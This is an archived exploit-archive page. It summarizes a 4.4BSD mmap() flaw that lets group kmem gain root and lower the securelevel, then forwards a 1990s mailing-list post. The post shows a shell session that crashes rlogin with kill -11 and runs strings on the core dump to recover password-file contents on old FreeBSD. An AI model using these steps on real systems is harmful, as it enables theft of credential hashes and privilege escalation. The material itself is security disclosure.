A 4.4BSD problem allows a read-only descriptor to a char device to be mmap()ed in RW mode. This can allow group kmem to become root and root to lower the system secure-level.
Theo de Raadt and Chuck Cranor
User kmem-> root ->modify secure-level->delete audit trail and load evil kernel mods.
OpenBSD 2.2 and below, FreeBSD 2.2.5 and below, BSDI 3.0 and NetBSD.
17 February 1996 for this posting
---------- Forwarded message ----------
If the following is already known, my deepest apologies for the junk mail..
RECONSTRUCT PARTS OF UN-SHADOWED PASSWORDFILE ON (at least) FreeBSD
Bronc Buster wrote:
>This exploit is very similer to the FTP exploit on BSD that creates a
>ftp.core file you can then strings and get the encrypted password file.
I tried this technique on my FreeBSD 2.1.0 box. It didn't work. I started
playing around with dump files:
~> rlogin 127.0.0.1
Last login: Mon Feb 17 00:35:49 from localhost
Copyright (c) 1980, 1983, 1986, 1988, 1990, 1991, 1993, 1994
The Regents of the University of California. All rights reserved.
FreeBSD 2.1.0-RELEASE (WIPS) #0: Thu Oct 17 03:37:25 SAT 1996
You have new mail.
~> ps -ax | grep rlogin
6528 ?? S 0:00.06 rlogind
6527 p1 S+ 0:00.05 rlogin 127.0.0.1
6529 p1 S+ 0:00.01 rlogin 127.0.0.1
~> kill -11 6529~> ls
Brain_Box NS cronjobs mail security
Mail News foon rlogin.core
~>strings rlogin.core > unshadowed.passwdfile.reconstruct
I also tried this on a FreeBSD 2.1.5 box, and it did the same thing. I
wonder if there is a way to make a core dump only readable by root, and why
this isn't the default?
Roelof W Temmingh Network & Data Security
firstname.lastname@example.org [w] South-Africa
email@example.com [ah] http://www.nanoteq.com
The master index of all exploits is available
here (Very large file)
Or you can pick your favorite operating system:
This page is part of Fyodor's exploit
For a free program to automate scanning your network for vulnerable
hosts and services, check out my network mapping tool, nmap. Or try these Insecure.Org resouces: